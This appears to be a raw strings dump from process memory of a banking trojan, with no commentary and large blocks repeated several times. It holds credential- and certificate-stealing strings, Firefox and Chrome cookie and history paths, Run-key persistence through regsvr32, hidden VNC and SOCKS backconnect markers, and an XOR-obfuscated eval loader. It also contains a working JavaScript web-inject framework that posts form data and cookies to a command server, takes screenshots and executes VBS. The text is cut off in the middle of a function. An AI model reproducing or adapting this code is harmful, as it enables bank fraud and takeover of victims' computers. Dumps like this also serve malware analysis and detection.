[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);user_pref("network.http.spdy.enabled.v3", false);user_pref("network.http.spdy.enabled.v3-1", false);user_pref("layers.acceleration.disabled", true);user_pref("gfx.direct2d.disabled", true);prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
COMDLG32.dll
WININET.DLL
C:\ProgramData\LibxaJximb\QamzEsom.ijv
{687F46D2-25E5-43B6-BD95-68B725074F1D}{0AE625D1-61C9-42E5-AEF4-7154387F4248}{6B376189-11A2-4F58-96A6-001E03862004}\\.\pipe\{19312A96-768E-4560-A72B-03BE621D2CDF}D{0AE625D1-61C9-42E5-AEF4-7154387F4248}{23DC640D-793E-4D8F-955D-2E6215F37B91}U{687F46D2-25E5-43B6-BD95-68B725074F1D}546B5A02-5978-4B96-802A-4C514A243A08
7%7.777@7
1#1-161@1|1
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
conhost.exe_2168_rwx_01150000_00055000:
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
eval((function(_x%x){var _x%x='';var _x%x="";for (var _x%x=0;_x%x<_x%x.length;_x%x )
{_x%x =String.fromCharCode(_x%x.charCodeAt(_x%x)^(_x%x&0xFF));_x%x ;}return _x%x;})(0x%x));
function EQFramework(Key)
var %s = new function()
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');framework_key%
{this["_Key"]=Key;this["_LastAsync"]=null;this["Version"]=2;this["GetXHR"]=function(){if( typeof XMLHttpRequest==="undefined"){XMLHttpRequest=function(){try{return new ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP")}catch(e){};try{return new ActiveXObject("Microsoft.XMLHTTP")}catch(e){};return false;}};return new XMLHttpRequest();};this["Query"]=function(Method,Url,Post,Callback){var xhr=this.GetXHR();var LastAsync=null;var thisfw=this;Async=( typeof (Callback)=="undefined")?false:true;Url="/" this["_Key"] "/" Math["random"]() "/" Url;if(Async==true){this["_LastAsync"]=null;xhr["onreadystatechange"]=function(){try{if(xhr["readyState"]==4){if(xhr["status"]!=200||xhr["responseText"]=="-"){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}else {if(xhr["responseText"]==" "){thisfw["_LastAsync"]=true;if( typeof (Callback)=="function"){Callback(true)};}else {thisfw["_LastAsync"]=xhr["responseText"];if( typeof (Callback)=="function"){Callback(xhr["responseText"])};}}}}catch(e){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}};};xhr["open"](Method,Url,Async);xhr["send"](Post);if(Async==true){return true};try{if(xhr["readyState"]==4&&xhr["status"]==200){if(xhr["responseText"]=="-"){return false}else {if(xhr["responseText"]==" "){return true}else {return xhr["responseText"]}}};return false;}catch(e){return false};};this["GetLastAsync"]=function(){return this["_LastAsync"]};this["SetVal"]=function(Name,Value,Callback){Url="1/" Name;return this.Query("POST",Url,Value,Callback);};this["GetVal"]=function(Name,Callback){Url="2/" Name;return this.Query("GET",Url,null,Callback);};this["DelVal"]=function(Name,Callback){Url="3/" Name;return this.Query("GET",Url,null,Callback);};this["ClearVals"]=function(Callback){Url="4/";return this.Query("GET",Url,null,Callback);};this["GetServer"]=function(Url,Ssl,Callback){t=(Ssl==true)?"S":"D";return this.Query("GET","5/" t "/" Url,null,Callback);};this["PostServer"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","5/" t "/" Url,Post,Callback);};this["Get"]=function(Url,Ssl,Cookie,Callback){t=(Ssl==true)?"S":"D";if( typeof (Cookie)=="undefined"||Cookie==false){Cookie=null;Type="GET";}else {Cookie="Cookie: " Cookie;Type="POST";};return this.Query(Type,"6/" t "/" Url,Cookie,Callback);};this["Post"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","7/" t "/" Url,Post,Callback);};this["ScreenShot"]=function(Info,Timeout,Size,Callback){Url="8/" Timeout "/" Size "/" encodeURIComponent(Info);return this.Query("GET",Url,null,Callback);};this["LogAdd"]=function(Text,Callback){Url="9/";return this.Query("POST",Url,Text,Callback);};this["UpdateConfig"]=function(Callback){Url="10/";return this.Query("GET",Url,null,Callback);};this["StartSocks"]=function(Data,Callback){Url="11/";return this.Query("POST",Url,Data,Callback);};this["StartVnc"]=function(Data,Callback){Url="12/";return this.Query("POST",Url,Data,Callback);};this["SendForm"]=function(Link,Data,Callback){Url="13/";Post=Link "\x0D\x0A" Data;return this.Query("POST",Url,Post,Callback);};this["StartVideo"]=function(WorkTime,Callback){Url="14/" WorkTime;Data=document["location"]["href"];return this.Query("POST",Url,Data,Callback);};this["StopVideo"]=function(Callback){Url="15/";return this.Query("GET",Url,null,Callback);};this["ExecVBS"]=function(Data,Callback){Url="16/";return this.Query("POST",Url,Data,Callback);};this["Hide"]=function(Name){El=document["getElementById"](Name);El["parentNode"]["removeChild"](El);};}9L%d_
advapi32.dll
ole32.dll
shlwapi.dll
user32.dll
userenv.dll
wsock32.dll
RegCloseKey
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);user_pref("network.http.spdy.enabled.v3", false);user_pref("network.http.spdy.enabled.v3-1", false);user_pref("layers.acceleration.disabled", true);user_pref("gfx.direct2d.disabled", true);prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
COMDLG32.dll
WININET.DLL
O.PRF*
%XkOS
7%7.777@7
1#1-161@1|1
.pdata
@.reloc
@8.tW
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
conhost.exe_2168_rwx_014D0000_00077000:
.text
`.rdata
@.data
.reloc
HHt.HHt
hu2.iuj
More information: hXXp://VVV.ibsensoftware.com/
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
eval((function(_x%x){var _x%x='';var _x%x="";for (var _x%x=0;_x%x<_x%x.length;_x%x )
{_x%x =String.fromCharCode(_x%x.charCodeAt(_x%x)^(_x%x&0xFF));_x%x ;}return _x%x;})(0x%x));
function EQFramework(Key)
var %s = new function()
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');framework_key%
{this["_Key"]=Key;this["_LastAsync"]=null;this["Version"]=2;this["GetXHR"]=function(){if( typeof XMLHttpRequest==="undefined"){XMLHttpRequest=function(){try{return new ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP")}catch(e){};try{return new ActiveXObject("Microsoft.XMLHTTP")}catch(e){};return false;}};return new XMLHttpRequest();};this["Query"]=function(Method,Url,Post,Callback){var xhr=this.GetXHR();var LastAsync=null;var thisfw=this;Async=( typeof (Callback)=="undefined")?false:true;Url="/" this["_Key"] "/" Math["random"]() "/" Url;if(Async==true){this["_LastAsync"]=null;xhr["onreadystatechange"]=function(){try{if(xhr["readyState"]==4){if(xhr["status"]!=200||xhr["responseText"]=="-"){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}else {if(xhr["responseText"]==" "){thisfw["_LastAsync"]=true;if( typeof (Callback)=="function"){Callback(true)};}else {thisfw["_LastAsync"]=xhr["responseText"];if( typeof (Callback)=="function"){Callback(xhr["responseText"])};}}}}catch(e){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}};};xhr["open"](Method,Url,Async);xhr["send"](Post);if(Async==true){return true};try{if(xhr["readyState"]==4&&xhr["status"]==200){if(xhr["responseText"]=="-"){return false}else {if(xhr["responseText"]==" "){return true}else {return xhr["responseText"]}}};return false;}catch(e){return false};};this["GetLastAsync"]=function(){return this["_LastAsync"]};this["SetVal"]=function(Name,Value,Callback){Url="1/" Name;return this.Query("POST",Url,Value,Callback);};this["GetVal"]=function(Name,Callback){Url="2/" Name;return this.Query("GET",Url,null,Callback);};this["DelVal"]=function(Name,Callback){Url="3/" Name;return this.Query("GET",Url,null,Callback);};this["ClearVals"]=function(Callback){Url="4/";return this.Query("GET",Url,null,Callback);};this["GetServer"]=function(Url,Ssl,Callback){t=(Ssl==true)?"S":"D";return this.Query("GET","5/" t "/" Url,null,Callback);};this["PostServer"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","5/" t "/" Url,Post,Callback);};this["Get"]=function(Url,Ssl,Cookie,Callback){t=(Ssl==true)?"S":"D";if( typeof (Cookie)=="undefined"||Cookie==false){Cookie=null;Type="GET";}else {Cookie="Cookie: " Cookie;Type="POST";};return this.Query(Type,"6/" t "/" Url,Cookie,Callback);};this["Post"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","7/" t "/" Url,Post,Callback);};this["ScreenShot"]=function(Info,Timeout,Size,Callback){Url="8/" Timeout "/" Size "/" encodeURIComponent(Info);return this.Query("GET",Url,null,Callback);};this["LogAdd"]=function(Text,Callback){Url="9/";return this.Query("POST",Url,Text,Callback);};this["UpdateConfig"]=function(Callback){Url="10/";return this.Query("GET",Url,null,Callback);};this["StartSocks"]=function(Data,Callback){Url="11/";return this.Query("POST",Url,Data,Callback);};this["StartVnc"]=function(Data,Callback){Url="12/";return this.Query("POST",Url,Data,Callback);};this["SendForm"]=function(Link,Data,Callback){Url="13/";Post=Link "\x0D\x0A" Data;return this.Query("POST",Url,Post,Callback);};this["StartVideo"]=function(WorkTime,Callback){Url="14/" WorkTime;Data=document["location"]["href"];return this.Query("POST",Url,Data,Callback);};this["StopVideo"]=function(Callback){Url="15/";return this.Query("GET",Url,null,Callback);};this["ExecVBS"]=function(Data,Callback){Url="16/";return this.Query("POST",Url,Data,Callback);};this["Hide"]=function(Name){El=document["getElementById"](Name);El["parentNode"]["removeChild"](El);};}9L%d_
advapi32.dll
ole32.dll
shlwapi.dll
user32.dll
userenv.dll
wsock32.dll
RegCloseKey
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);user_pref("network.http.spdy.enabled.v3", false);user_pref("network.http.spdy.enabled.v3-1", false);user_pref("layers.acceleration.disabled", true);user_pref("gfx.direct2d.disabled", true);prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
COMDLG32.dll
WININET.DLL
C:\ProgramData\LibxaJximb\QamzEsom.ijv
{687F46D2-25E5-43B6-BD95-68B725074F1D}{0AE625D1-61C9-42E5-AEF4-7154387F4248}{6B376189-11A2-4F58-96A6-001E03862004}\\.\pipe\{19312A96-768E-4560-A72B-03BE621D2CDF}D{0AE625D1-61C9-42E5-AEF4-7154387F4248}{23DC640D-793E-4D8F-955D-2E6215F37B91}U{687F46D2-25E5-43B6-BD95-68B725074F1D}546B5A02-5978-4B96-802A-4C514A243A08
7%7.777@7
1#1-161@1|1
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
SearchIndexer.exe_2228_rwx_03350000_00055000:
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
eval((function(_x%x){var _x%x='';var _x%x="";for (var _x%x=0;_x%x<_x%x.length;_x%x )
{_x%x =String.fromCharCode(_x%x.charCodeAt(_x%x)^(_x%x&0xFF));_x%x ;}return _x%x;})(0x%x));
function EQFramework(Key)
var %s = new function()
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');framework_key%
{this["_Key"]=Key;this["_LastAsync"]=null;this["Version"]=2;this["GetXHR"]=function(){if( typeof XMLHttpRequest==="undefined"){XMLHttpRequest=function(){try{return new ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP")}catch(e){};try{return new ActiveXObject("Microsoft.XMLHTTP")}catch(e){};return false;}};return new XMLHttpRequest();};this["Query"]=function(Method,Url,Post,Callback){var xhr=this.GetXHR();var LastAsync=null;var thisfw=this;Async=( typeof (Callback)=="undefined")?false:true;Url="/" this["_Key"] "/" Math["random"]() "/" Url;if(Async==true){this["_LastAsync"]=null;xhr["onreadystatechange"]=function(){try{if(xhr["readyState"]==4){if(xhr["status"]!=200||xhr["responseText"]=="-"){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}else {if(xhr["responseText"]==" "){thisfw["_LastAsync"]=true;if( typeof (Callback)=="function"){Callback(true)};}else {thisfw["_LastAsync"]=xhr["responseText"];if( typeof (Callback)=="function"){Callback(xhr["responseText"])};}}}}catch(e){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}};};xhr["open"](Method,Url,Async);xhr["send"](Post);if(Async==true){return true};try{if(xhr["readyState"]==4&&xhr["status"]==200){if(xhr["responseText"]=="-"){return false}else {if(xhr["responseText"]==" "){return true}else {return xhr["responseText"]}}};return false;}catch(e){return false};};this["GetLastAsync"]=function(){return this["_LastAsync"]};this["SetVal"]=function(Name,Value,Callback){Url="1/" Name;return this.Query("POST",Url,Value,Callback);};this["GetVal"]=function(Name,Callback){Url="2/" Name;return this.Query("GET",Url,null,Callback);};this["DelVal"]=function(Name,Callback){Url="3/" Name;return this.Query("GET",Url,null,Callback);};this["ClearVals"]=function(Callback){Url="4/";return this.Query("GET",Url,null,Callback);};this["GetServer"]=function(Url,Ssl,Callback){t=(Ssl==true)?"S":"D";return this.Query("GET","5/" t "/" Url,null,Callback);};this["PostServer"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","5/" t "/" Url,Post,Callback);};this["Get"]=function(Url,Ssl,Cookie,Callback){t=(Ssl==true)?"S":"D";if( typeof (Cookie)=="undefined"||Cookie==false){Cookie=null;Type="GET";}else {Cookie="Cookie: " Cookie;Type="POST";};return this.Query(Type,"6/" t "/" Url,Cookie,Callback);};this["Post"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","7/" t "/" Url,Post,Callback);};this["ScreenShot"]=function(Info,Timeout,Size,Callback){Url="8/" Timeout "/" Size "/" encodeURIComponent(Info);return this.Query("GET",Url,null,Callback);};this["LogAdd"]=function(Text,Callback){Url="9/";return this.Query("POST",Url,Text,Callback);};this["UpdateConfig"]=function(Callback){Url="10/";return this.Query("GET",Url,null,Callback);};this["StartSocks"]=function(Data,Callback){Url="11/";return 